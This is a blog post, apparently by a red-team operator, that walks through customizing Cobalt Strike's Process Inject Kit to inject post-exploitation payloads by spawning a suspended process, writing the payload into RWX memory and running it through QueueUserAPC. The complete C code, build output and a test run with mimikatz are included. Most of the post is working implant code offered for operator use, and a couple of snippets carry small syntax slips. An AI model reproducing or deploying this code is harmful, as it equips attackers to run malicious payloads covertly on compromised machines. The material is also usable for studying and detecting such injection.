Table of Contents
Open Table of Contents
Introduction
In this blog post I discuss about a simple example of modifying Cobalt Strike’s default process injection behavior to use QueueUserAPC
through the Process Inject Kit.
Cobalt Strike Post-Exploitation in a Nutshell
When you load BOFs or run tools like Mimikatz through a beacon, Cobalt Strike will either perform inline execution or a fork and run of the capability.
-
Inline execution: Usually for BOFs, pushed to the beacon and executed within the beacon’s process. Local process memory allocation and injection occurs here.
-
Fork and run: Spawns a temporary process and injects a DLL into that process. The DLL contains the corresponding capability and is reflectively loaded into the temporary process.
Fork and run commands have two variants:
-
Process injection spawn: spawns a temporary process, defined by the “spawnto” setting (e.g. when using the
spawn
command) -
Process injection explicit: injects into an existing process (e.g. when using
shinject
and need to specify a remote process ID)
These two variants are controlled by the BeaconInjectProcess
and BeaconInjectTemporaryProcess
internal beacon APIs, which provies a layer of abstraction to the actual process injection methods being used.
Before Cobalt Strike 4.5, the only way to modify the process injection techniques was through the teamserver’s C2 profile and didn’t provide much customizability. Now, Cobalt Strike comes with a Process Inject kit that allows operators to customize the process injection methods from these fork and run commands.
Goals
My goal was to implement QueueUserAPC into Cobalt Strike beacons using the Process Inject Kit.
QueueUserAPC allows an application to queue an Asynchronous Procedure Call (APC) to a thread. Once the thread is in an alertable state, the APC is executed. QueueUserAPC also works with suspended threads, as long as the thread is resumed later.
In malware, the APC is usually a pointer to some shellcode, meaning that once the thread is alerted, the shellcode executes.
Since QueueUserAPC requires an alertable or suspended thread, one of the main ways to perform QueueUserAPC is to create a suspended process so that all of its threads are suspended. We can then queue an APC to the suspended process’s main thread, then resume that thread to execute the shellcode.
The Process Inject Kit comes with two .c
files, process_inject_spawn.c
and process_inject_explicit.c
, which contain code to perform their associated fork and run technique.
I decided to go with process_inject_spawn.c
for this case, which spawns a temporary process to execute our capabilities. We can alter this code to get our process to spawn in a suspended state and perform QueueUserAPC against it.
Customizing Process Spawning
The code currently uses BeaconSpawnTemporaryProcess
, which accounts for things like PPIDs, process architecture, and other Beacon-related data, but doesn’t provide options to create the process in a suspended state.
if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
return;
}
We would need to use WinAPIs like CreateProcessA
for our case.
For all WinAPIs like CreateProcessA
, we need to import them into our program by adding something like this to the top of the file:
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
And then in our code, we can call CreateProcessA
by using the following:
// CreateProcess in suspended state
char cmd[] = "notepad.exe"
BOOL success = KERNEL32$CreateProcessA(
NULL,
cmd,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
Getting the spawnto
Value
By default, when running fork and run command using the “spawn” method, Cobalt Strike will spawn rundll32.dll
and go on from there. This is the spawnto
value of the Cobalt Strike teamserver.
However, this is heavily signatured so it’s common to see operators change this value to something else. We can do this within the beacon by running the command:
spawnto x64 %windir%\sysnative\notepad.exe
Or for the entire teamserver in the C2 profile:
post-ex {
set spawnto_x86 "%windir%\\syswow64\\notepad.exe";
set spawnto_x64 "%windir%\\sysnative\\notepad.exe";
}
We want to make sure that our custom process injection method is consistent with this setting, so we use the BeaconGetSpawnTo
function which is defined in beacon.h
.
void BeaconGetSpawnTo(
BOOL x86,
char * buffer,
int length
)
BeaconGetSpawnTo
has three parameters:
x86
determines whether thespawnto
value is associated with the x64 or x86 settingbuffer
is the char buffer that will store thespawnto
valuelength
is probably the size of the char buffer? I had no idea.
I looked at some GitHub repos of this implementation and found one that defines a constant MAX_PATH_LENGTH
as 1000 and just uses it for BeaconGetSpawnTo
. So I included that into my code.
// define MAX_PATH_LENGTH at top of file
#define MAX_PATH_LENGTH 1000
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
We can now use this spawnto
value in our CreateProcessA
function:
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
NULL,
spawnTo,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
Allocating and Copying Memory
Before we call QueueUserAPC
, we need to allocate memory into the remote process and copy our shellcode into that allocation. For this I decided to go with the good ol’ VirtualAllocEx
and WriteProcessMemory
.
// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
pi.hProcess,
NULL,
dllLen,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL) {
BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);
// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
pi.hProcess,
remoteBuffer,
dllPtr,
dllLen,
&bytesWritten);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
return;
}
QueueUserAPC
After creating a suspended process, allocating and copying memory into that process, we can finally perform QueueUserAPC
against the suspended main thread of the process.
It’s actually pretty easy to do. We just need to call QueueUserAPC
against the pointer to the remote shellcode and a handle to the remote, suspended thread. We then call ResumeThread
to allow the thread to execute our shellcode.
// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
(PAPCFUNC)remoteBuffer,
pi.hThread,
0);
if (queueUserApcResult == 0) {
BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
return;
}
KERNEL32$ResumeThread(pi.hThread);
Examining Process Memory
We can build the kit with build.sh
, which produces a .cna
file that we can load into our teamserver.
$ ./build.sh /opt/cobaltstrike/custom-inject-output
[Process Inject kit] [+] You have a x86_64 mingw--I will recompile the process inject beacon object files
[Process Inject kit] [*] Compile process_inject_spawn.x64.o
[Process Inject kit] [*] Compile process_inject_spawn.x86.o
[Process Inject kit] [*] Compile process_inject_explicit.x64.o
[Process Inject kit] [*] Compile process_inject_explicit.x86.o
[Process Inject kit] [+] The Process inject object files are saved in '/opt/cobaltstrike/custom-inject-output'
Since I was calling VirtualAllocEx
with RWX memory permissions, I wanted to see what it would look like in Process Hacker to confirm that the WinAPIs were being used properly.
I ran mimikatz standard::sleep 80000
on the beacon, since running mimikatz
is one of the commands that uses the fork and run method.
Examining the memory contents it seemed that the region had been freed.
This was because I had the setting cleanup
set to true
in my malleable C2 profile, so I switched that to false
and ran the mimikatz
command again.
And there it is! The RWX has confirmed that my VirtualAllocEx
is being used and my code isn’t broken.
Code Snippets
Imports and constants:
#define MAX_PATH_LENGTH 1000
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTESlpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC (
PAPCFUNC pfnAPC,
HANDLE hThread,
ULONG_PTR dwData);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread (
HANDLE hThread);
DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flALlocationType,
DWORD flProtect);
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory (
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten);
QueueUserAPC
implementation:
/* begin QueueUserAPC implementation */
// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);
// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
NULL,
spawnTo,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW | CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Process ID of spawned process: %d", pi.dwProcessId);
// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
pi.hProcess,
NULL,
dllLen,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL) {
BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);
// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
pi.hProcess,
remoteBuffer,
dllPtr,
dllLen,
&bytesWritten);
if (!success) {
BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
return;
}
// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
(PAPCFUNC)remoteBuffer,
pi.hThread,
0);
if (queueUserApcResult == 0) {
BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
return;
}
KERNEL32$ResumeThread(pi.hThread);